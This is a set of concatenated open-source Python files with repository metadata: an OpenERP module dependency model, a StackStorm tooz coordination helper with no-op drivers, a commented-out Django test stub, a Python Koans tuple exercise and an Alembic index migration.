('uninstallable', 'Uninstallable'),
('uninstalled', 'Not Installed'),
('installed', 'Installed'),
('to upgrade', 'To be upgraded'),
('to remove', 'To be removed'),
('to install', 'To be installed'),
('unknown', 'Unknown'),
]
class module_dependency(osv.Model):
_name = "ir.module.module.dependency"
_description = "Module dependency"
# the dependency name
name = fields2.Char(index=True)
# the module that depends on it
module_id = fields2.Many2one('ir.module.module', 'Module', ondelete='cascade')
# the module corresponding to the dependency, and its status
depend_id = fields2.Many2one('ir.module.module', 'Dependency', compute='_compute_depend')
state = fields2.Selection(DEP_STATES, string='Status', compute='_compute_state')
@api.multi
@api.depends('name')
def _compute_depend(self):
# retrieve all modules corresponding to the dependency names
names = list(set(dep.name for dep in self))
mods = self.env['ir.module.module'].search([('name', 'in', names)])
# index modules by name, and assign dependencies
name_mod = dict((mod.name, mod) for mod in mods)
for dep in self:
dep.depend_id = name_mod.get(dep.name)
@api.one
@api.depends('depend_id.state')
def _compute_state(self):
self.state = self.depend_id.state or 'unknown'
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| {
"content_hash": "7d3d4831e8256a95ad1169e5bf9dba0f",
"timestamp": "",
"source": "github",
"line_count": 808,
"max_line_length": 201,
"avg_line_length": 45.100247524752476,
"alnum_prop": 0.5764111852034796,
"repo_name": "diogocs1/comps",
"id": "b327871c953ace5897304067bc610515dfb37a17",
"size": "37426",
"binary": false,
"copies": "29",
"ref": "refs/heads/master",
"path": "web/openerp/addons/base/module/module.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "701"
},
{
"name": "CSS",
"bytes": "856533"
},
{
"name": "HTML",
"bytes": "299671"
},
{
"name": "Java",
"bytes": "620166"
},
{
"name": "JavaScript",
"bytes": "5844302"
},
{
"name": "Makefile",
"bytes": "21002"
},
{
"name": "PHP",
"bytes": "14259"
},
{
"name": "Python",
"bytes": "10647376"
},
{
"name": "Ruby",
"bytes": "220"
},
{
"name": "Shell",
"bytes": "17746"
},
{
"name": "XSLT",
"bytes": "120278"
}
],
"symlink_target": ""
} |
from oslo_config import cfg
from tooz import coordination
from tooz import locking
from st2common import log as logging
from st2common.util import system_info
LOG = logging.getLogger(__name__)
COORDINATOR = None
__all__ = [
'configured',
'get_coordinator',
'coordinator_setup',
'coordinator_teardown'
]
class NoOpLock(locking.Lock):
def __init__(self, name='noop'):
super(NoOpLock, self).__init__(name=name)
def acquire(self, blocking=True):
return True
def release(self):
return True
def heartbeat(self):
return True
class NoOpDriver(coordination.CoordinationDriver):
"""
Tooz driver where each operation is a no-op.
This driver is used if coordination service is not configured.
"""
def __init__(self, member_id):
super(NoOpDriver, self).__init__(member_id)
def watch_join_group(self, group_id, callback):
self._hooks_join_group[group_id].append(callback)
def unwatch_join_group(self, group_id, callback):
return None
def watch_leave_group(self, group_id, callback):
return None
def unwatch_leave_group(self, group_id, callback):
return None
def watch_elected_as_leader(self, group_id, callback):
return None
def unwatch_elected_as_leader(self, group_id, callback):
return None
@staticmethod
def stand_down_group_leader(group_id):
return None
@staticmethod
def create_group(group_id):
return None
@staticmethod
def get_groups():
return None
@staticmethod
def join_group(group_id, capabilities=''):
return None
@staticmethod
def leave_group(group_id):
return None
@staticmethod
def delete_group(group_id):
return None
@staticmethod
def get_members(group_id):
return None
@staticmethod
def get_member_capabilities(group_id, member_id):
return None
@staticmethod
def update_capabilities(group_id, capabilities):
return None
@staticmethod
def get_leader(group_id):
return None
@staticmethod
def get_lock(name):
return NoOpLock(name='noop')
def configured():
"""
Return True if the coordination service is properly configured.
:rtype: ``bool``
"""
backend_configured = cfg.CONF.coordination.url is not None
mock_backend = backend_configured and (cfg.CONF.coordination.url.startswith('zake') or
cfg.CONF.coordination.url.startswith('file'))
return backend_configured and not mock_backend
def coordinator_setup():
"""
Sets up the client for the coordination service.
URL examples for connection:
zake://
file:///tmp
redis://username:password@host:port
mysql://username:password@host:port/dbname
"""
url = cfg.CONF.coordination.url
lock_timeout = cfg.CONF.coordination.lock_timeout
proc_info = system_info.get_process_info()
member_id = '%s_%d' % (proc_info['hostname'], proc_info['pid'])
if url:
coordinator = coordination.get_coordinator(url, member_id, lock_timeout=lock_timeout)
else:
# Use a no-op backend
# Note: We don't use tooz to obtain a reference since for this to work we would need to
# register a plugin inside setup.py entry_point and use python setup.py develop for tests
# to work
coordinator = NoOpDriver(member_id)
coordinator.start()
return coordinator
def coordinator_teardown(coordinator):
coordinator.stop()
def get_coordinator():
global COORDINATOR
if not configured():
LOG.warn('Coordination backend is not configured. Code paths which use coordination '
'service will use best effort approach and race conditions are possible.')
if not COORDINATOR:
COORDINATOR = coordinator_setup()
return COORDINATOR
| {
"content_hash": "64b36b2e5e82dafc4ca55d2df37cf049",
"timestamp": "",
"source": "github",
"line_count": 164,
"max_line_length": 97,
"avg_line_length": 24.164634146341463,
"alnum_prop": 0.6482462780721675,
"repo_name": "tonybaloney/st2",
"id": "eb4c434f785ff981994fa6f8e67ac8cb38002713",
"size": "4743",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "st2common/st2common/services/coordination.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "198"
},
{
"name": "Makefile",
"bytes": "46066"
},
{
"name": "PowerShell",
"bytes": "299"
},
{
"name": "Python",
"bytes": "4278891"
},
{
"name": "Shell",
"bytes": "47687"
},
{
"name": "Slash",
"bytes": "677"
}
],
"symlink_target": ""
} |
from django.test import TestCase
from api import *
from pprint import pprint
# Create your tests here.
#pprint(get_certificate_count("CSE101", "2017", "IITB"))
#pprint(get_all_courses_certificate_count())
#pprint(get_certificate_students("AP101","2017","APIx"))
#pprint(get_all_courses_certificate_students()) | {
"content_hash": "7eaae6a96e4e4142e30c59c632e0ece6",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 56,
"avg_line_length": 31.1,
"alnum_prop": 0.7556270096463023,
"repo_name": "jaygoswami2303/course_dashboard_api",
"id": "380719721bd83b2bd9c1c5fdc17d7fd92f5b0f00",
"size": "311",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "v2/CourseAPI/tests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "165924"
}
],
"symlink_target": ""
} |
from runner.koan import *
class AboutTuples(Koan):
def test_creating_a_tuple(self):
count_of_three = (1, 2, 5)
self.assertEqual(5, count_of_three[2])
def test_tuples_are_immutable_so_item_assignment_is_not_possible(self):
count_of_three = (1, 2, 5)
try:
count_of_three[2] = "three"
except TypeError as ex:
msg = ex.args[0]
# Note, assertRegexpMatches() uses regular expression pattern matching,
# so you don't have to copy the whole message.
self.assertRegexpMatches(msg, "'tuple' object.*")
def test_tuples_are_immutable_so_appending_is_not_possible(self):
count_of_three = (1, 2, 5)
with self.assertRaises(AttributeError): count_of_three.append("boom")
# Tuples are less flexible than lists, but faster.
def test_tuples_can_only_be_changed_through_replacement(self):
count_of_three = (1, 2, 5)
list_count = list(count_of_three)
list_count.append("boom")
count_of_three = tuple(list_count)
self.assertEqual((1, 2, 5, 'boom'), count_of_three)
def test_tuples_of_one_look_peculiar(self):
self.assertEqual(int, (1).__class__)
self.assertEqual(tuple, (1,).__class__)
self.assertEqual(("Hello comma!", ), ("Hello comma!", ))
def test_tuple_constructor_can_be_surprising(self):
self.assertEqual(('S', 'u', 'r', 'p', 'r', 'i', 's', 'e', '!'), tuple("Surprise!"))
def test_creating_empty_tuples(self):
self.assertEqual((), ())
self.assertEqual((), tuple()) #Sometimes less confusing
def test_tuples_can_be_embedded(self):
lat = (37, 14, 6, 'N')
lon = (115, 48, 40, 'W')
place = ('Area 51', lat, lon)
self.assertEqual(('Area 51', (37, 14, 6, 'N'), (115, 48, 40, 'W')), place)
def test_tuples_are_good_for_representing_records(self):
locations = [
("Illuminati HQ", (38, 52, 15.56, 'N'), (77, 3, 21.46, 'W')),
("Stargate B", (41, 10, 43.92, 'N'), (1, 49, 34.29, 'W')),
]
locations.append( ("Cthulu", (26, 40, 1, 'N'), (70, 45, 7, 'W')) )
self.assertEqual('Cthulu', locations[2][0])
self.assertEqual(15.56, locations[0][1][2])
| {
"content_hash": "97f382aa80cd78edd5d64b412337eb19",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 91,
"avg_line_length": 34.93846153846154,
"alnum_prop": 0.5689123734037869,
"repo_name": "ryanfitch/Python3_Koans_Solutions",
"id": "9a8fb3dfaa7298b64a4303baa19e69b80c0c0515",
"size": "2318",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python3/koans/about_tuples.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "816"
},
{
"name": "Python",
"bytes": "162992"
},
{
"name": "Shell",
"bytes": "44"
}
],
"symlink_target": ""
} |
"""remove constraint from markers: provider_and_id_idx_markers
Revision ID: 9d24fbb0f1fa
Revises: 3f07363021f6
Create Date: 2019-10-19 21:00:22.609457
"""
# revision identifiers, used by Alembic.
revision = '9d24fbb0f1fa'
down_revision = '3f07363021f6'
branch_labels = None
depends_on = None
from alembic import op
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index('provider_and_id_idx_markers', table_name='markers')
op.create_index('provider_and_id_idx_markers', 'markers', ['provider_and_id'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_index('provider_and_id_idx_markers', 'markers', ['provider_and_id'], unique=True)
# ### end Alembic commands ###
| {
"content_hash": "79c86351b919e0fefc40988647475a3e",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 96,
"avg_line_length": 29.321428571428573,
"alnum_prop": 0.6942752740560292,
"repo_name": "hasadna/anyway",
"id": "c8971a4a00e3b49db5df15bed9f17e9d815e005d",
"size": "821",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "alembic/versions/9d24fbb0f1fa_remove_constraint_from_markers_provider_.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "34833"
},
{
"name": "Dockerfile",
"bytes": "2219"
},
{
"name": "HTML",
"bytes": "891295"
},
{
"name": "JavaScript",
"bytes": "392412"
},
{
"name": "Jupyter Notebook",
"bytes": "79628"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "PLpgSQL",
"bytes": "1980"
},
{
"name": "Procfile",
"bytes": "87"
},
{
"name": "Python",
"bytes": "1316356"
},
{
"name": "Shell",
"bytes": "5614"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.